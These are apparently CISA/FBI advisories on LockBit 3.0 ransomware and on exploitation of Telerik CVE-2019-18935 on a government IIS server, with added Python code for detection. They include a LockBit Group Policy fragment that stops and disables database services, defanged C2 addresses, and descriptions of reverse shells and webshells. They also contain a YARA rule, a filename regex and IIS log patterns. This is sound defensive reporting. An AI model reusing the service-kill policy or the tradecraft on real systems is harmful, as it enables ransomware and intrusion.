    <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0">
    <Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/>
  </NTService>
</NTServices>
Registry.pol
The following registry configuration changes the value for the Group Policy refresh time, disables SmartScreen, and disables Windows Defender.
Force GPUpdate
Once new group policies are added, a PowerShell command using Group Policy update (GPUpdate) applies the new group policy changes to all computers on the AD domain.
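As an added example (not code from the advisory or from CISA), the following Python parses a Group Policy Preferences Services.xml of the kind shown above and flags entries that both stop a service and disable it at boot; the sample XML, its placeholder changed/uid values, the SYSVOL path in the comment and the alert threshold are assumptions.

```python
"""Flag Group Policy Preferences Services.xml entries that stop and disable
services, the Services.xml pattern the advisory attributes to LockBit 3.0.
Added example; the sample XML and its placeholder values are constructed."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample modelled on the advisory's fragment. GPP service files are
# normally found in SYSVOL under Policies\{GUID}\Machine\Preferences\Services\
# Services.xml (assumed path); the changed/uid values here are placeholders.
SAMPLE_SERVICES_XML = """<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter"
             image="4" changed="2023-03-01 10:00:00" uid="{PLACEHOLDER-1}" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser"
             image="4" changed="2023-03-01 10:00:00" uid="{PLACEHOLDER-2}" disabled="0">
    <Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER"
             image="4" changed="2023-03-01 10:00:00" uid="{PLACEHOLDER-3}" disabled="0">
    <Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/>
  </NTService>
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="Spooler"
             image="4" changed="2022-06-01 09:00:00" uid="{PLACEHOLDER-4}" disabled="0">
    <Properties startupType="AUTOMATIC" serviceName="Spooler" serviceAction="START" timeout="30"/>
  </NTService>
</NTServices>"""

# A benign administrative policy for contrast (constructed).
BENIGN_SERVICES_XML = """<NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}">
  <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="Spooler"
             image="4" changed="2022-06-01 09:00:00" uid="{PLACEHOLDER-5}" disabled="0">
    <Properties startupType="AUTOMATIC" serviceName="Spooler" serviceAction="START" timeout="30"/>
  </NTService>
</NTServices>"""

# Service-name prefixes taken from the advisory's Services.xml listing.
DATABASE_PREFIXES = ("SQL", "MSSQL", "SSAS", "SSIS", "MSDTS")


def parse_ntservices(xml_text: str) -> List[Dict[str, str]]:
    """Return one record per <NTService>, merging in its <Properties> attributes."""
    root = ET.fromstring(xml_text)
    records: List[Dict[str, str]] = []
    for svc in root.iter("NTService"):
        props = svc.find("Properties")
        if props is None:
            continue
        records.append({
            "serviceName": props.get("serviceName", svc.get("name", "")),
            "startupType": props.get("startupType", "").upper(),
            "serviceAction": props.get("serviceAction", "").upper(),
            "timeout": props.get("timeout", ""),
            "changed": svc.get("changed", ""),
        })
    return records


def stop_and_disable_entries(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Entries that both stop the service now and disable it at boot."""
    return [r for r in records
            if r["serviceAction"] == "STOP" and r["startupType"] == "DISABLED"]


def assess_services_xml(xml_text: str, threshold: int = 3) -> Dict[str, object]:
    """Summarise a Services.xml; 'suspicious' when at least `threshold` services
    are killed or any database service is targeted (threshold is an assumption)."""
    records = parse_ntservices(xml_text)
    killed = stop_and_disable_entries(records)
    db_hits = [r["serviceName"] for r in killed
               if r["serviceName"].upper().startswith(DATABASE_PREFIXES)]
    return {
        "total": len(records),
        "killed": [r["serviceName"] for r in killed],
        "database_services": db_hits,
        "suspicious": len(killed) >= threshold or bool(db_hits),
    }


if __name__ == "__main__":
    print(assess_services_xml(SAMPLE_SERVICES_XML))
    print(assess_services_xml(BENIGN_SERVICES_XML))
```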
Services Killed
Processes Killed
LockBit 3.0 Ransom Note
Network Connections
If configured, LockBit 3.0 will send two HTTP POST requests to one of the C2 servers. Information about the victim host and bot is encrypted with an Advanced Encryption Standard (AES) key and encoded in Base64.
User Agent Strings
MITRE ATT&CK TECHNIQUES
See Table 3 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
MITIGATIONS
The FBI, CISA, and the MS-ISAC recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of LockBit 3.0’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, and the MS-ISAC authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
The FBI, CISA, and the MS-ISAC recommend continually testing your security program at scale and in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
RESOURCES
REPORTING
The FBI is seeking any information that can be legally shared, including:
The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at report@cisa.gov. State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.
Article source: us-cert.gov
Threat Actors Exploit Progress Telerik Vulnerability in U.S. Government IIS Server
SUMMARY
From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding detection and mitigation recommendations.
Overview
CISA and authoring organizations assess that, beginning as late as November 2022, threat actors successfully exploited a .NET deserialization vulnerability (CVE-2019-18935) in an instance of Telerik UI for ASP.NET AJAX Q2 2013 SP1 (version 2013.2.717) running on an FCEB agency’s Microsoft IIS server. This exploit, which results in interactive access with the web server, enabled the threat actors to successfully execute remote code on the vulnerable web server. Though the agency’s vulnerability scanner had the appropriate plugin for CVE-2019-18935, it failed to detect the vulnerability due to the Telerik UI software being installed in a file path it does not typically scan. This may be the case for many software installations, as file paths widely vary depending on the organization and installation method.
In addition to CVE-2019-18935, this version (2013.2.717) of Telerik UI for ASP.NET AJAX contains the following known vulnerabilities: CVE-2017-11357, CVE-2017-11317, and CVE-2017-9248. Analysis suggests that cyber threat actors exploited CVE-2019-18935 in conjunction with either CVE-2017-11357 or CVE-2017-11317. Australian Cyber Security Centre (ACSC) Advisory 2020-004 assesses that exploitation of CVE-2019-18935 is only possible with knowledge of Telerik RadAsyncUpload encryption keys.[2] Threat actors can obtain these keys through either prior knowledge or exploitation of vulnerabilities—CVE-2017-11357 or CVE-2017-11317—present in older, unpatched versions of Telerik released between 2007 and 2017. Forensic evidence is not available to definitively confirm exploitation of either CVE-2017-11357 or CVE-2017-11317.
Threat Actor Activity
CISA and authoring organizations observed multiple cyber threat actors, including an APT actor—hereafter referred to as Threat Actor 1 (TA1)—and known cybercriminal actor XE Group—hereafter referred to as Threat Actor 2 (TA2)—conducting reconnaissance and scanning activities [T1595.002] that correlate to the successful exploitation of CVE-2019-18935 in the agency’s IIS server running Telerik UI for ASP.NET AJAX [T1190].
When exploiting the vulnerability, the threat actors uploaded malicious dynamic-link library (DLL) files (some masqueraded as portable network graphics [PNG] files) [T1105] to the C:\Windows\Temp directory. The malicious files were then executed from the C:\Windows\Temp directory via the w3wp.exe process—a legitimate process that runs on IIS servers. This process is routine for handling requests sent to web servers and delivering content. The review of antivirus logs identified that some DLL files were created [T1055.001] and detected as early as August 2021.
CISA and authoring organizations confirmed that some malicious files dropped on the IIS server are consistent with a previously reported file naming convention that threat actors commonly use when exploiting CVE-2019-18935.[3] The threat actors name the files in the Unix Epoch time format and use the date and time as recorded on the target system. The file naming convention follows the pattern [10 digits].[7 digits].dll (e.g., a file created on October 31, 2022, could be 1667203023.5321205.dll).
The names of some of the PNG files were misleading. For example, file 1596835329.5015914.png, which decodes to August 7, 2020, 21:22:09 UTC, first appeared on October 13, 2022, but the file system shows a creation date of August 7, 2020. The uncorrelated Unix Epoch time format may indicate that the threat actors used the timestomping [T1070.006] technique. This file naming convention is a primary IOC used by the threat actors.
In many cases, malicious artifacts were not available for analysis because the threat actors’ malware—that looks for and removes files with the .dll file extension—removed files [T1070.004] from the C:\Windows\Temp directory. Through full packet data capture analysis and reverse engineering of malicious DLL files, no indications of additional malicious activity or sub-processes were found executed by the w3wp.exe process. CISA observed error messages being sent to the threat actors’ command and control (C2) server when permission restraints prevented the service account from executing the malicious DLLs and writing new files.
Network activity analysis was consistent with the artifacts provided for review. Analysts did not observe evidence of privilege escalation or lateral movement.
Threat Actor 1
CISA and authoring organizations observed TA1 exploiting CVE-2019-18935 for system enumeration beginning in August 2022. The vulnerability allows a threat actor to upload malicious DLLs on a target system and execute them by abusing a legitimate process, e.g., the w3wp.exe process. In this instance, TA1 was able to upload malicious DLL files to the C:\Windows\Temp directory and then achieve remote code execution, executing the DLL files via the w3wp.exe process.
At least nine DLL files were used for discovery [TA0007], C2 [TA0011], and defense evasion [TA0005]. All of the analyzed samples have network parameters, including host name, domain name, Domain Name System (DNS) server Internet Protocol (IP) address and machine name, Network Basic Input/Output System (NetBIOS) ID, adapter information, IP address, subnet, gateway IP, and Dynamic Host Configuration Protocol (DHCP) server [T1016]. All analyzed samples communicate this collected data to a C2 server at IP address 137.184.130[.]162 or 45.77.212[.]12. The C2 traffic to these IP addresses uses a non-application layer protocol [T1095] by leveraging Transmission Control Protocol (TCP) clear text (i.e., unencrypted) over port 443. Analysis also identified that TA1’s malware removes files with the .dll extension in the C:\Windows\Temp directory on the server. TA1 may use this capability to hide additional malicious activity on the network.
CISA, in coordination with the authoring organizations, identified and observed the following threat actor IPs and timestamps associated with this activity:
IP Address | First Identified | Last Identified
137.184.130[.]162 | 09/26/2022 | 10/08/2022
45.77.212[.]12 | 10/07/2022 | 11/25/2022
104.225.129[.]102 | 10/10/2022 | 11/16/2022
149.28.85[.]24 | 10/12/2022 | 10/17/2022
185.186.245[.]72 | 10/18/2022 | 10/18/2022
193.8.172[.]113 | 09/25/2022 | 09/25/2022
193.8.172[.]13 | 09/25/2022 | 10/17/2022
216.120.201[.]12 | 10/13/2022 | 11/10/2022
5.34.178[.]246 | 09/25/2022 | 09/25/2022
79.133.124[.]242 | 09/25/2022 | 09/25/2022
92.38.169[.]193 | 09/27/2022 | 10/08/2022
92.38.176[.]109 | 09/12/2022 | 09/25/2022
92.38.176[.]130 | 09/25/2022 | 10/07/2022
Threat Actor 2
TA2—identified as likely the cybercriminal actor XE Group—often includes xe[word] nomenclature in original filenames and registered domains. Volexity lists this naming convention and other observed TTPs as common for this threat actor group.[4]
As early as August 2021, CISA and authoring organizations observed TA2 delivering malicious PNG files that, following analysis, were masqueraded DLL files to avoid detection [T1036.005]. Similar to TA1, TA2 exploited CVE-2019-18935 and was able to upload at least three unique DLL files into the C:\Windows\Temp directory that TA2 executed via the w3wp.exe process. These DLL files drop and execute reverse (remote) shell utilities for unencrypted communication with C2 IP addresses associated with the malicious domains listed in Table 2. Note: At the time of analysis, the domains resolved to the listed IP addresses.
IP Address | Resolving Domains
184.168.104[.]171 | xework[.]com, xegroups[.]com, hivnd[.]com
144.96.103[.]245 | xework[.]com
Analysis of DLL files determined the files listed in Table 3 were dropped, decoded, and attempted to connect to the respective malicious domains. Embedded payloads dropped by the DLL files were observed using the command line utility certutil[.]exe and writing new files as xesvrs[.]exe to invoke reverse shell utilities execution.
Filename | Description
XEReverseShell.exe | DLL files (masqueraded as PNG files) located in the C:\Windows\Temp directory contain a base64 encoded file with the internal name XEReverseShell.exe, which was dropped into the same directory as sortcombat.exe. When executed, the reverse shell utility attempts to connect to xework[.]com or xegroups[.]com to obtain the IP address of the C2 server and port number for unencrypted communication. Note: It is likely the threat actors changed the file extension from .dll to .png to avoid detection.
Multi-OS_ReverseShell.exe | Reverse shell utility decoded from the base64 encoded file xesmartshell.tmp. When executed, it will attempt to connect to xegroups[.]com or xework[.]com to obtain the IP address of the C2 server and port number for unencrypted communication.
SortVistaCompat | Base64 encoded payload dropped from Multi-OS_ReverseShell.exe. This file receives the C2 IP and port from xework[.]com.
When the TA2 malware is executed, a DLL file drops an executable (XEReverseShell.exe) that attempts to pull a C2 IP address and port number from xework[.]com or xegroups[.]com. If communication is established between the TA2 malware and the C2, the C2 can return either of the following:
- xesetshell, causing the malware to connect to the server and download a file called small.txt—a base64-encoded webshell that the malware decodes and places in the C:\Windows\Temp directory.
- xequit, causing the malware to sleep for a period of time determined by the threat actors.
The two files xesmartshell.tmp and SortVistaCompat have the capability to drop an Active Server Pages (ASPX) webshell—a base64 encoded text file small.txt decoded [T1140] as small.aspx [T1505.003]—to enumerate drives; to send, receive, and delete files; and to execute incoming commands. The webshell contains an interface for easily browsing files, directories, or drives on the system, and allows the user to upload or download files to any directory. No webshells were observed to be dropped on the target system, likely due to the abused service account having restrictive write permissions.
For more information on the DLLs, binaries, and webshell, see CISA MAR-10413062-1.v1 Telerik Vulnerability in U.S. Government IIS Server.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 4 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping to the MITRE ATT&CK framework, see CISA’s Decider Tool and Best Practices for MITRE ATT&CK Mapping Guide.
Reconnaissance
Technique Title | ID | Use
Active Scanning: Vulnerability Scanning | T1595.002 | Actors were observed conducting active scanning activity for vulnerable devices and specific ports.
Initial Access
Technique Title | ID | Use
Exploit Public-Facing Application | T1190 | Actors exploited a known vulnerability in the Microsoft IIS server.
Persistence
Technique Title | ID | Use
Server Software Component: Web Shell | T1505.003 | TA2’s malware dropped an ASPX webshell to enumerate drives; send, receive, and delete files; and execute commands.
Defense Evasion
Technique Title | ID | Use
Masquerading: Match Legitimate Name or Location | T1036.005 | Actors leveraged the legitimate w3wp.exe process on the IIS server to write malicious DLL files and evade detection.
Process Injection: DLL Injection | T1055.001 | Actors loaded newly created DLLs into a running w3wp.exe process.
Indicator Removal: File Deletion | T1070.004 | TA1’s malware deleted files with “.dll” from the C:\Windows\Temp directory, which may indicate hidden malicious activity on the network.
Indicator Removal: Timestomp | T1070.006 | Actors modified file time attributes to insert misleading creation dates.
Decode Files | T1140 | The base64 encoded text file small.txt decoded as the webshell small.aspx.
Discovery
Technique Title | ID | Use
File and Directory Discovery | T1083 | Actors enumerated the IIS server via OS fingerprinting, executed Windows processes, and collected network information. TA1’s malware enumerates systems, processes, files, and directories.
System Network Configuration Discovery | T1016 | TA1’s malware gathers network parameters, including host name, domain name, DNS servers, NetBIOS ID, adapter information, IP address, subnet, gateway IP, and DHCP server.
Command and Control
Technique Title | ID | Use
Ingress Tool Transfer | T1105 | TA1 and TA2 uploaded malicious DLL files (some masqueraded as PNG files) to the C:\Windows\Temp directory.
Non-Application Layer Protocol | T1095 | Actors used a non-application layer protocol (TCP) for w3wp.exe process exploitation, C2, and enumeration on the IIS server.
DETECTION METHODS
CISA and authoring organizations recommend that organizations review the steps listed in this section and Table 4: Identified ATT&CK Techniques for Enterprise to detect similar activity on IIS servers.
Yara Rule
CISA developed the following YARA rule from the base proof-of-concept code for CVE-2019-18935.[5] Note: Authoring organizations do not guarantee all malicious DLL files (if identified) will use the same code provided in this YARA rule.
rule CISA_10424018_01 {
meta:
Author = "CISA Code & Media Analysis"
Incident = "10424018"
Date = "2023-02-07"
Last_Modified = "20230216_1500"
Actor = "n/a"
Family = "n/a"
Capabilities = "n/a"
Malware_Type = "n/a"
Tool_Type = "n/a"
Description = "Detects open-source exploit samples"
SHA256 = "n/a"
strings:
$s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C }
$s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B }
$s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 }
$s3 = { 54 65 6C 65 72 69 6B 20 55 49 }
$s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C }
$s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 }
$s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 }
$s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 }
$s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 }
$s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 }
$s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 }
$s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B }
$s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 }
$s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 }
condition:
($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13)
}
Log Collection, Retention, and Analysis
CISA, FBI, and MS-ISAC recommend that organizations utilize a centralized log collection and monitoring capability, as well as implement or increase logging and forensic data retention. Longer retention policies improve the availability of data for forensic analysis and aid thorough identification of incident scope.
Creation of Malicious DLLs
CISA, FBI, and MS-ISAC recommend that organizations use process monitoring—which provides visibility into file system and application process activity—to detect suspicious executable files running from the C:\Windows\Temp directory. Process monitoring via Windows Event Code 4688 will detect the legitimate w3wp.exe process running suspicious DLL files and other anomalous child processes. Note: Enabling this event may inundate security event logging. Use centralized log collection to prevent log rollover, increase log retention and archiving, and/or enable command line event logging.
Forensic analysis commonly identified the threat actors taking the following steps:
1. A malicious DLL file (e.g., C:\Windows\Temp\1665890187.8690152.dll) is created by process w3wp.exe PID 6484.
2. The DLL file is run by w3wp.exe PID 6484.
3. w3wp.exe PID 6484 connects to 45.77.212[.]12 over port 443.
4. C:\Windows\System32\vcruntime140.dll (Windows C runtime library) is loaded to execute the payload.
Steps 1 and 2 occur every time a malicious DLL file is created. In some cases, an ASP .NET temp file was created, but this may have indicated benign IIS server activity. Note: The Process ID (PID) used in this example is unique to this investigation and is not universal. IP address 45.77.212[.]12 correlates to TA1, but the pattern can be used as general practice to identify similar activity.
Additional Searching for IIS Servers
The following information was derived from artifact analysis and is provided to equip IT infrastructure defenders searching for similar activity on an IIS server. Several artifacts can be referenced to assist in determining if CVE-2019-18935 has been successfully exploited.
File Type: DLL
Location: %SystemDrive%\Windows\Temp
When this CVE is exploited, it uploads malicious DLL files to the C:\Windows\Temp directory. The malicious DLL file naming convention translates to the exact time the file was uploaded to the server. The time is represented in a series of digits, known as Unix Epoch time. The files observed during this investigation contained two sets of digits separated by a period (.) before the DLL extension (.dll). Example: 1667206973.2270932.dll
Nearly all recovered files contain a series of 10 digits to the left of the period (.) and seven digits to the right. However, one file contained only five digits in the second set, which should be taken into consideration when writing regex patterns to search for the existence of these files. Example Regex: \d{10}\.\d{1,8}\.dll
These numbers can be copied and translated from digits into readable language with the month, day, year, hour, minute, and seconds displayed.
Log Type: IIS
Location: %SystemDrive%\inetpub\logs\LogFiles
When investigating IIS logs, specific fields were searched for and captured during the time of each connection.
If the Unix Epoch time signature has been translated from a DLL filename, specific logs can be searched based on that time. However, if the Unix Epoch time signature has not been translated, the following will still work, but may take longer for the query to run.
The four most important fields to identify this traffic are noted in the following table. These descriptions are sourced directly from Microsoft.[6]
General Name | Field Name | Description
Method | cs-method | Requested action; for example, a GET method
URI Stem | cs-uri-stem | Universal Resource Identifier (URI), or target, of the action
URI Query | cs-uri-query | The query, if any, that the client was trying to perform; a URI query is necessary only for dynamic pages.
Protocol Status | sc-status | Hypertext Transfer Protocol (HTTP) or File Transfer Protocol (FTP) status code
Note: Depending on how logs are collected and stored, the field names may not be an exact match; this should be taken into consideration when constructing queries.
When ingesting logs into security information and event management (SIEM), the final field names did not use a hyphen (-) but used an underscore (_).
Example: cs_method instead of cs-method
Artifacts:
Field Name | Artifact
cs-method | POST
cs-uri-stem | /Telerik.Web.UI.WebResource.axd
cs-uri-query | type=rau
sc-status | 200 and 302
When reviewing logs, two IIS events were observed with the same timestamp each time CVE-2019-18935 was exploited. Both events contained the same information in the cs-method, cs-uri-stem, and cs-uri-query fields. One event had an sc-status of 200 and the other had an sc-status of 302.
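As an added example (not from the advisory or CISA), the following Python ties the two artifacts above together: it decodes epoch-named DLL/PNG files into UTC timestamps, parses an IIS W3C log for POST requests to /Telerik.Web.UI.WebResource.axd with type=rau, keeps only the timestamps carrying both a 200 and a 302, and correlates the two; the sample log lines, the client IPs and the 120-second correlation window are constructed assumptions.

```python
"""Correlate epoch-named DLL drops with the IIS log pattern for CVE-2019-18935
exploitation (POST /Telerik.Web.UI.WebResource.axd?type=rau, paired 200/302).
Added example; the log excerpt below is constructed, not from the advisory."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional, Set

# Advisory pattern: 10 epoch-second digits, a period, 1-8 digits, then .dll;
# masqueraded copies carried a .png extension instead.
EPOCH_NAME_RE = re.compile(r"^(\d{10})\.(\d{1,8})\.(?:dll|png)$", re.IGNORECASE)
TELERIK_HANDLER = "/telerik.web.ui.webresource.axd"

# Constructed W3C log excerpt. IIS writes W3C logs in UTC by default; adjust if
# the server was configured for local time. 07:57:03 matches the advisory's
# example filename 1667203023.5321205.dll (31 Oct 2022 07:57:03 UTC).
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 8.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2022-10-31 07:57:03 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.10 python-requests/2.28 200 0 0 125
2022-10-31 07:57:03 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 203.0.113.10 python-requests/2.28 302 0 0 3
2022-10-31 07:58:44 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.7 Mozilla/5.0 200 0 0 12
2022-10-31 09:00:00 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 443 - 198.51.100.7 Mozilla/5.0 200 0 0 40
"""


def decode_epoch_filename(filename: str) -> Optional[datetime]:
    """UTC time encoded in an epoch-named DLL/PNG, or None if the name differs."""
    match = EPOCH_NAME_RE.match(filename)
    if not match:
        return None
    return datetime.fromtimestamp(int(match.group(1)), tz=timezone.utc)


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log text, taking column names from the '#Fields:' line."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or not fields:
            continue
        else:
            values = line.split()
            if len(values) == len(fields):
                rows.append(dict(zip(fields, values)))
    return rows


def rau_upload_events(rows: List[Dict[str, str]]) -> Dict[datetime, Set[str]]:
    """Group RadAsyncUpload POSTs by timestamp -> set of sc-status values seen."""
    events: Dict[datetime, Set[str]] = defaultdict(set)
    for row in rows:
        if (row.get("cs-method") == "POST"
                and row.get("cs-uri-stem", "").lower() == TELERIK_HANDLER
                and "type=rau" in row.get("cs-uri-query", "").lower()):
            stamp = datetime.strptime(f"{row['date']} {row['time']}",
                                      "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
            events[stamp].add(row.get("sc-status", ""))
    return dict(events)


def paired_rau_events(events: Dict[datetime, Set[str]]) -> List[datetime]:
    """Timestamps carrying both a 200 and a 302, the pair seen per exploitation."""
    return sorted(stamp for stamp, codes in events.items() if {"200", "302"} <= codes)


def correlate(filenames: List[str], events: Dict[datetime, Set[str]],
              window: timedelta = timedelta(seconds=120)) -> Dict[str, List[datetime]]:
    """Map each epoch-named file to the paired RAU events within `window` of it."""
    paired = paired_rau_events(events)
    hits: Dict[str, List[datetime]] = {}
    for name in filenames:
        decoded = decode_epoch_filename(name)
        if decoded is None:
            continue  # not an epoch-named artifact; nothing to correlate
        hits[name] = [stamp for stamp in paired if abs(stamp - decoded) <= window]
    return hits


if __name__ == "__main__":
    found = rau_upload_events(parse_iis_log(SAMPLE_IIS_LOG))
    names = ["1667203023.5321205.dll", "1596835329.5015914.png", "vcruntime140.dll"]
    for name, stamps in correlate(names, found).items():
        print(name, decode_epoch_filename(name).isoformat(),
              [s.isoformat() for s in stamps])
```

A file whose decoded time has no paired 200/302 nearby (the timestomped PNG in the sample) is still reported, with an empty match list, so the analyst sees the mismatch rather than silently losing it.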
Log Type: Windows Event Application Logs
Location: %SystemDrive%\Windows\System32\winevt\logs\Application.evtx
Kroll Artifact Parser and Extractor (KAPE), a forensic artifact collector and parser, was used to extract the Windows event logs from a backup image of the compromised IIS server. All field names refer to the labels provided via KAPE exports. The strings are of value and can be used to locate other artifacts if different tools are used. Note: The payload data in the following table has been shortened to only necessary strings to obscure and protect victim information.
EventID | Payload
